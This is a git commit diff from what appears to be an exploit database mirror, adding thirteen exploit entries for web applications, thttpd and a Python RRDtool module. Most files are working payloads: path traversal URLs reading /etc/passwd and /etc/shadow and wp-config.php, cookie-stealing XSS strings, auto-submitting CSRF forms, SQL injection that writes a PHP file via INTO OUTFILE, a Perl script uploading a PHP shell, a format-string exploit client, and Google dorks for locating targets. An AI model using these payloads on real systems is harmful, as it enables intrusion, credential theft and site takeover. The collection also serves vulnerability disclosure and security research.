DB: 2015-10-24
13 new exploits
This commit is contained in:
parent
b4832cb23e
commit
e75323a0d9
14 changed files with 477 additions and 0 deletions
13
files.csv
13
files.csv
|
@ -34789,3 +34789,16 @@ id,file,description,date,author,platform,type,port
|
|||
38511,platforms/php/webapps/38511.txt,"Gallery Server Pro Arbitrary File Upload Vulnerability",2013-05-14,"Drew Calcott",php,webapps,0
|
||||
38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0
|
||||
38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0
|
||||
38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Vulnerability",2013-05-15,ByEge,php,webapps,0
|
||||
38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting Vulnerability",2013-05-14,"Deepankar Arora",php,webapps,0
|
||||
38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin Cross Site Request Forgery Vulnerability",2013-05-16,"Henri Salo",php,webapps,0
|
||||
38518,platforms/php/webapps/38518.txt,"Jojo CMS 'search' Parameter Cross Site Scripting Vulnerability",2013-05-15,"High-Tech Bridge SA",php,webapps,0
|
||||
38519,platforms/php/webapps/38519.txt,"Jojo CMS 'X-Forwarded-For' HTTP header SQL-Injection Vulnerability",2013-05-15,"High-Tech Bridge SA",php,webapps,0
|
||||
38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin Cross Site Request Forgery Vulnerability",2013-05-16,"Enigma Ideas",php,webapps,0
|
||||
38521,platforms/multiple/remote/38521.c,"Python RRDtool Module Function Format String Vulnerability",2013-05-18,"Thomas Pollet",multiple,remote,0
|
||||
38522,platforms/linux/remote/38522.txt,"Acme thttpd HTTP Server Directory Traversal Vulnerability",2013-05-19,Metropolis,linux,remote,0
|
||||
38523,platforms/php/webapps/38523.txt,"Weyal CMS Multiple SQL Injection Vulnerabilities",2013-05-23,XroGuE,php,webapps,0
|
||||
38524,platforms/php/webapps/38524.pl,"Matterdaddy Market Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0
|
||||
38525,platforms/php/webapps/38525.txt,"Subrion 3.X.X - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0
|
||||
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
||||
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/linux/remote/38522.txt
Executable file
9
platforms/linux/remote/38522.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/60010/info
|
||||
|
||||
thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks.
|
||||
|
||||
www.example.com/../../../../../../../../etc/passwd
|
||||
|
||||
www.example.com/../../../../../../../../etc/shadow
|
139
platforms/multiple/remote/38521.c
Executable file
139
platforms/multiple/remote/38521.c
Executable file
|
@ -0,0 +1,139 @@
|
|||
source: http://www.securityfocus.com/bid/60004/info
|
||||
|
||||
The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may exploit this issue to execute arbitrary code within the context of the affected application or to crash the application.
|
||||
|
||||
RRDtool 1.4.7 is affected; other versions may also be vulnerable.
|
||||
|
||||
#include <stdio.h>
|
||||
#include <errno.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netdb.h>
|
||||
#include <netinet/in.h>
|
||||
#include <stdarg.h>
|
||||
#include <string.h>
|
||||
#define DFLTHOST "www.example.com"
|
||||
#define DFLTPORT 5501
|
||||
#define MAXMSG 256
|
||||
#define fgfsclose close
|
||||
void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port);
|
||||
int fgfswrite(int sock, char *msg, ...);
|
||||
const char *fgfsread(int sock, int wait);
|
||||
void fgfsflush(int sock);
|
||||
int fgfswrite(int sock, char *msg, ...)
|
||||
{
|
||||
va_list va;
|
||||
ssize_t len;
|
||||
char buf[MAXMSG];
|
||||
va_start(va, msg);
|
||||
vsnprintf(buf, MAXMSG - 2, msg, va);
|
||||
va_end(va);
|
||||
printf("SEND: \t<%s>\n", buf);
|
||||
strcat(buf, "\015\012");
|
||||
len = write(sock, buf, strlen(buf));
|
||||
if (len < 0) {
|
||||
perror("fgfswrite");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
return len;
|
||||
}
|
||||
const char *fgfsread(int sock, int timeout)
|
||||
{
|
||||
static char buf[MAXMSG];
|
||||
char *p;
|
||||
fd_set ready;
|
||||
struct timeval tv;
|
||||
ssize_t len;
|
||||
FD_ZERO(&ready);
|
||||
FD_SET(sock, &ready);
|
||||
tv.tv_sec = timeout;
|
||||
tv.tv_usec = 0;
|
||||
if (!select(32, &ready, 0, 0, &tv))
|
||||
return NULL;
|
||||
len = read(sock, buf, MAXMSG - 1);
|
||||
if (len < 0) {
|
||||
perror("fgfsread");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
if (len == 0)
|
||||
return NULL;
|
||||
for (p = &buf[len - 1]; p >= buf; p--)
|
||||
if (*p != '\015' && *p != '\012')
|
||||
break;
|
||||
*++p = '\0';
|
||||
return strlen(buf) ? buf : NULL;
|
||||
}
|
||||
void fgfsflush(int sock)
|
||||
{
|
||||
const char *p;
|
||||
while ((p = fgfsread(sock, 0)) != NULL) {
|
||||
printf("IGNORE: \t<%s>\n", p);
|
||||
}
|
||||
}
|
||||
int fgfsconnect(const char *hostname, const int port)
|
||||
{
|
||||
struct sockaddr_in serv_addr;
|
||||
struct hostent *hostinfo;
|
||||
int sock;
|
||||
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
|
||||
if (sock < 0) {
|
||||
perror("fgfsconnect/socket");
|
||||
return -1;
|
||||
}
|
||||
hostinfo = gethostbyname(hostname);
|
||||
if (hostinfo == NULL) {
|
||||
fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname);
|
||||
close(sock);
|
||||
return -2;
|
||||
}
|
||||
serv_addr.sin_family = AF_INET;
|
||||
serv_addr.sin_port = htons(port);
|
||||
serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr;
|
||||
if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
|
||||
perror("fgfsconnect/connect");
|
||||
close(sock);
|
||||
return -3;
|
||||
}
|
||||
return sock;
|
||||
}
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
int sock;
|
||||
unsigned port;
|
||||
const char *hostname, *p;
|
||||
int i;
|
||||
hostname = argc > 1 ? argv[1] : DFLTHOST;
|
||||
port = argc > 2 ? atoi(argv[2]) : DFLTPORT;
|
||||
sock = fgfsconnect(hostname, port);
|
||||
if (sock < 0)
|
||||
return EXIT_FAILURE;
|
||||
fgfswrite(sock, "data");
|
||||
fgfswrite(sock, "set /sim/rendering/clouds3d-enable true");
|
||||
fgfswrite(sock, "set /environment/clouds");
|
||||
for (i=0; i < 5; i++) {
|
||||
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i);
|
||||
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i);
|
||||
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i);
|
||||
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i);
|
||||
fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i);
|
||||
}
|
||||
p = fgfsread(sock, 3);
|
||||
if (p != NULL)
|
||||
printf("READ: \t<%s>\n", p);
|
||||
for (i=0; i < 5; i++) {
|
||||
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i);
|
||||
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i);
|
||||
fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i);
|
||||
}
|
||||
p = fgfsread(sock, 3);
|
||||
if (p != NULL)
|
||||
printf("READ: \t<%s>\n", p);
|
||||
fgfswrite(sock, "quit");
|
||||
fgfsclose(sock);
|
||||
return EXIT_SUCCESS;
|
||||
}
|
7
platforms/php/webapps/38515.txt
Executable file
7
platforms/php/webapps/38515.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/59886/info
|
||||
|
||||
The wp-FileManager plugin for WordPress is prone to a vulnerability that lets attackers download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this issue to download arbitrary files within the context of the web server process. Information obtained may aid in further attacks.
|
||||
|
||||
http://www.example.com/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
|
7
platforms/php/webapps/38516.txt
Executable file
7
platforms/php/webapps/38516.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/59928/info
|
||||
|
||||
Open Flash Chart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
http://ww.example.com/joomla/components/com_jnews/includes/openflashchart/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()
|
23
platforms/php/webapps/38517.html
Executable file
23
platforms/php/webapps/38517.html
Executable file
|
@ -0,0 +1,23 @@
|
|||
source: http://www.securityfocus.com/bid/59932/info
|
||||
|
||||
The Mail On Update plugin for WordPress is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
|
||||
|
||||
Mail On Update 5.1.0 is vulnerable; prior versions may also be affected.
|
||||
|
||||
<html><form action="https://example.com/wp/wp-admin/options-general.php?page=mail-on-update"; method="post"
|
||||
class="buttom-primary">
|
||||
<input name="mailonupdate_mailto" type="hidden" value="example0 () example com
|
||||
example1 () example com
|
||||
example2 () example com
|
||||
example3 () example com
|
||||
example4 () example com
|
||||
example5 () example com
|
||||
example6 () example com
|
||||
example7 () example com
|
||||
example8 () example com
|
||||
example9 () example com
|
||||
example10 () example com
|
||||
henri+monkey () nerv fi" />
|
||||
<input name="submit" type="submit" value="Save"/></form></html>
|
12
platforms/php/webapps/38518.txt
Executable file
12
platforms/php/webapps/38518.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/59933/info
|
||||
|
||||
Jojo CMS is prone to a cross-site scripting vulnerability.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
<form action="http://www.example.com/forgot-password/" method="post">
|
||||
<input type="hidden" name="search" value='<script>alert(document.cookike);</script>'>
|
||||
<input type="submit" id="btn">
|
||||
</form>
|
13
platforms/php/webapps/38519.txt
Executable file
13
platforms/php/webapps/38519.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/59934/info
|
||||
|
||||
Jojo CMS is prone to an SQL-injection vulnerability because it fails to sanitize user-supplied input.
|
||||
|
||||
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Jojo CMS 1.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
POST /articles/test/ HTTP/1.1
|
||||
X-Forwarded-For: ' OR 1=1 INTO OUTFILE '/var/www/file.php' --
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 88
|
||||
name=name&email=user%40mail.com&website=&anchortext=&comment=comment&submit=Post+Comment
|
18
platforms/php/webapps/38520.html
Executable file
18
platforms/php/webapps/38520.html
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/59940/info
|
||||
|
||||
The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
|
||||
|
||||
WP cleanfix 2.4.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
SRF PoC - generated by Burp Suite Professional -->
|
||||
<body>
|
||||
<form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
|
||||
<input type="hidden" name="action" value="wpCleanFixAjax" />
|
||||
<input type="hidden" name="command" value="echo phpversion();" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
11
platforms/php/webapps/38523.txt
Executable file
11
platforms/php/webapps/38523.txt
Executable file
|
@ -0,0 +1,11 @@
|
|||
source: http://www.securityfocus.com/bid/60089/info
|
||||
|
||||
Weyal CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/fullstory.php?id=-999 union all select 1,2,version(),user(),database(),6
|
||||
|
||||
http://www.example.com/fullstory.php?id=-999 UNION SELECT 1,2,version(),database(),5,6,7,8,9,10,11,12,13,14
|
||||
|
||||
http://www.example.com/countrys.php?countryid=-999 union all select 1,version(),database()
|
52
platforms/php/webapps/38524.pl
Executable file
52
platforms/php/webapps/38524.pl
Executable file
|
@ -0,0 +1,52 @@
|
|||
source: http://www.securityfocus.com/bid/60150/info
|
||||
|
||||
Matterdaddy Market is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
Exploiting these issues could allow an attacker to execute arbitrary script code, upload arbitrary files, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
Matterdaddy Market 1.4.2 is vulnerable; other version may also be affected.
|
||||
|
||||
#!/usr/bin/perl
|
||||
|
||||
use strict;
|
||||
use warnings;
|
||||
use LWP::UserAgent;
|
||||
use HTTP::Request::Common;
|
||||
print <<INTRO;
|
||||
|====================================================|
|
||||
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|
||||
|= >> Provided By KedAns-Dz << |
|
||||
|= e-mail : ked-h[at]hotmail.com |
|
||||
|====================================================|
|
||||
INTRO
|
||||
print "\n";
|
||||
print "[!] Enter URL(f.e: http://target.com): ";
|
||||
chomp(my $url=<STDIN>);
|
||||
print "\n";
|
||||
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
|
||||
chomp(my $file=<STDIN>);
|
||||
my $ua = LWP::UserAgent->new;
|
||||
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
|
||||
Content_Type => 'multipart/form-data',
|
||||
Content =>
|
||||
[
|
||||
'md_title' => '1337day',
|
||||
'md_description' => 'Inj3ct0r Exploit Database',
|
||||
'md_price' => '0',
|
||||
'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
|
||||
'city' => 'Hassi Messaoud',
|
||||
'namer' => 'KedAns-Dz',
|
||||
'category' => '4',
|
||||
'filetoupload' => $file,
|
||||
'filename' => 'k3dsh3ll.php;.jpg',
|
||||
# to make this exploit as sqli change file name to :
|
||||
# k3dsh3ll' [+ SQLi +].php.jpg
|
||||
# use temperdata better ;)
|
||||
] );
|
||||
print "\n";
|
||||
if($re->is_success) {
|
||||
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
|
||||
else { print "[!] Check your email and confirm u'r post! \n"; }
|
||||
} else { print "[-] HTTP request Failed!\n"; }
|
||||
exit;
|
||||
|
52
platforms/php/webapps/38525.txt
Executable file
52
platforms/php/webapps/38525.txt
Executable file
|
@ -0,0 +1,52 @@
|
|||
{-} Title => Subrion 3.X.X - Multiple Exploits
|
||||
|
||||
{-} Author => bRpsd (skype: vegnox)
|
||||
|
||||
{-} Date Release => 23 October, 2015
|
||||
|
||||
|
||||
{-} Vendor => Subrion
|
||||
Homepage => http://www.subrion.org/
|
||||
Download => http://tools.subrion.org/get/latest.zip
|
||||
Vulnerable Versions => 3.X.X
|
||||
Tested Version => Latest, 3.3.5 on a Wamp Server.
|
||||
|
||||
{x} Google Dork:: 1 => "© 2015 Powered by Subrion CMS"
|
||||
{x} Google Dork:: 2 => "Powered by Subrion CMS"
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------------------------
|
||||
The installation folder never get deleted or protected unless you deleted it yourself.
|
||||
Which let any unauthorized user access the installation panel and ruin your website in just a few steps ..
|
||||
--------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
#######################################################################################
|
||||
Vulnerability #1 : Reset Administrator Password & Database settings
|
||||
Risk: High
|
||||
File Path: http://localhost/cms/install/install/configuration/
|
||||
#######################################################################################
|
||||
|
||||
|
||||
|
||||
#######################################################################################
|
||||
Vulnerability #2 : Arbitrary File Download + Full Path Disclouser
|
||||
Risk: Medium
|
||||
File Path: http://localhost/cms/install/install/download/
|
||||
Method: POST
|
||||
Parameter (for file contents) : config_content
|
||||
#######################################################################################
|
||||
|
||||
|
||||
#######################################################################################
|
||||
Vulnerability #3 : Unauthorized Arbitrary Plugins Installer
|
||||
Risk: Medium
|
||||
File Path: http://localhost/cms/install/install/plugins/
|
||||
#######################################################################################
|
||||
|
||||
|
||||
** SOLUTION ** ! :
|
||||
Solution for all vulnerabilities is to delete the file located at:
|
||||
/install/modules/module.install.php
|
||||
|
||||
|
||||
H@PPY H@CK1NG !
|
47
platforms/php/webapps/38527.txt
Executable file
47
platforms/php/webapps/38527.txt
Executable file
|
@ -0,0 +1,47 @@
|
|||
Realtyna RPL 8.9.2 Joomla Extension Multiple SQL Injection Vulnerabilities
|
||||
|
||||
|
||||
Vendor: Realtyna LLC
|
||||
Product web page: https://www.realtyna.com
|
||||
Affected version: 8.9.2
|
||||
|
||||
Summary: Realtyna CRM (Client Relationship Management) Add-on
|
||||
for RPL is a Real Estate CRM specially designed and developed
|
||||
based on business process and models required by Real Estate
|
||||
Agents/Brokers. Realtyna CRM intends to increase the Conversion
|
||||
Ratio of the website Visitors to Leads and then Leads to Clients.
|
||||
|
||||
|
||||
Desc: Realtyna RPL suffers from multiple SQL Injection vulnerabilities.
|
||||
Input passed via multiple POST parameters is not properly sanitised
|
||||
before being returned to the user or used in SQL queries. This can
|
||||
be exploited to manipulate SQL queries by injecting arbitrary SQL code.
|
||||
|
||||
Tested on: Apache
|
||||
PHP/5.4.38
|
||||
MySQL/5.5.42-cll
|
||||
|
||||
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
|
||||
|
||||
|
||||
Advisory ID: ZSL-2015-5272
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5272.php
|
||||
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
|
||||
CVE ID: CVE-2015-7714
|
||||
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7714
|
||||
|
||||
|
||||
05.10.2015
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://localhost/administrator/index.php
|
||||
POST parameters: id, copy_field, pshow, css, tip, cat_id, text_search, plisting, pwizard
|
||||
|
||||
Payloads:
|
||||
|
||||
- option=com_rpl&view=addon_membership_members&format=edit&id=84'
|
||||
- option=com_rpl&view=property_structure&format=ajax&function=new_field&id=3004'&type=text
|
||||
- option=com_rpl&view=rpl_multilingual&format=ajax&function=data_copy©_field=308'©_from=©_to=en_gb©_method=1
|
||||
- option=com_rpl&view=property_structure&format=ajax&function=update_field&id=3002&options=0&css=&tip=&style=&name=&cat_id=1&text_search=0&plisting=0&pshow=1'&pwizard=1&mode=add
|
74
platforms/php/webapps/38528.txt
Executable file
74
platforms/php/webapps/38528.txt
Executable file
|
@ -0,0 +1,74 @@
|
|||
Realtyna RPL 8.9.2 Joomla Extension Persistent XSS And CSRF Vulnerabilities
|
||||
|
||||
|
||||
Vendor: Realtyna LLC
|
||||
Product web page: https://www.realtyna.com
|
||||
Affected version: 8.9.2
|
||||
|
||||
Summary: Realtyna CRM (Client Relationship Management) Add-on
|
||||
for RPL is a Real Estate CRM specially designed and developed
|
||||
based on business process and models required by Real Estate
|
||||
Agents/Brokers. Realtyna CRM intends to increase the Conversion
|
||||
Ratio of the website Visitors to Leads and then Leads to Clients.
|
||||
|
||||
|
||||
Desc: The application allows users to perform certain actions
|
||||
via HTTP requests without performing any validity checks to
|
||||
verify the requests. This can be exploited to perform certain
|
||||
actions with administrative privileges if a logged-in user visits
|
||||
a malicious web site. Multiple cross-site scripting vulnerabilities
|
||||
were also discovered. The issue is triggered when input passed
|
||||
via the multiple parameters is not properly sanitized before
|
||||
being returned to the user. This can be exploited to execute
|
||||
arbitrary HTML and script code in a user's browser session in
|
||||
context of an affected site.
|
||||
|
||||
Tested on: Apache
|
||||
PHP/5.4.38
|
||||
MySQL/5.5.42-cll
|
||||
|
||||
Vulnerability discovered by Bikramaditya 'PhoenixX' Guha
|
||||
|
||||
|
||||
Advisory ID: ZSL-2015-5271
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5271.php
|
||||
Vendor: http://rpl.realtyna.com/Change-Logs/RPL7-Changelog
|
||||
CVE ID: CVE-2015-7715
|
||||
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7715
|
||||
|
||||
|
||||
05.10.2015
|
||||
|
||||
--
|
||||
|
||||
|
||||
1. CSRF:
|
||||
|
||||
<html lang="en">
|
||||
<head>
|
||||
<title>CSRF POC</title>
|
||||
</head>
|
||||
<body>
|
||||
<form action="http://localhost/administrator/index.php" id="formid" method="post">
|
||||
<input type="hidden" name="option" value="com_rpl" />
|
||||
<input type="hidden" name="view" value="addon_membership_members" />
|
||||
<input type="hidden" name="format" value="ajax" />
|
||||
<input type="hidden" name="function" value="add_user" />
|
||||
<input type="hidden" name="id" value="85" />
|
||||
</form>
|
||||
<script>
|
||||
document.getElementById('formid').submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
2. Cross Site Scripting (Stored):
|
||||
|
||||
http://localhost/administrator/index.php
|
||||
POST parameters: new_location_en_gb, new_location_fr_fr
|
||||
|
||||
Payloads:
|
||||
|
||||
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=%22onmousemove%3D%22alert(1)%22%22&new_location_fr_fr=&level=1&parent=&function=add_location
|
||||
option=com_rpl&view=location_manager&format=ajax&new_location_en_gb=&new_location_fr_fr=%22onmousemove%3D%22alert(2)%22%22&level=1&parent=&function=add_location
|
Loading…
Add table
Reference in a new issue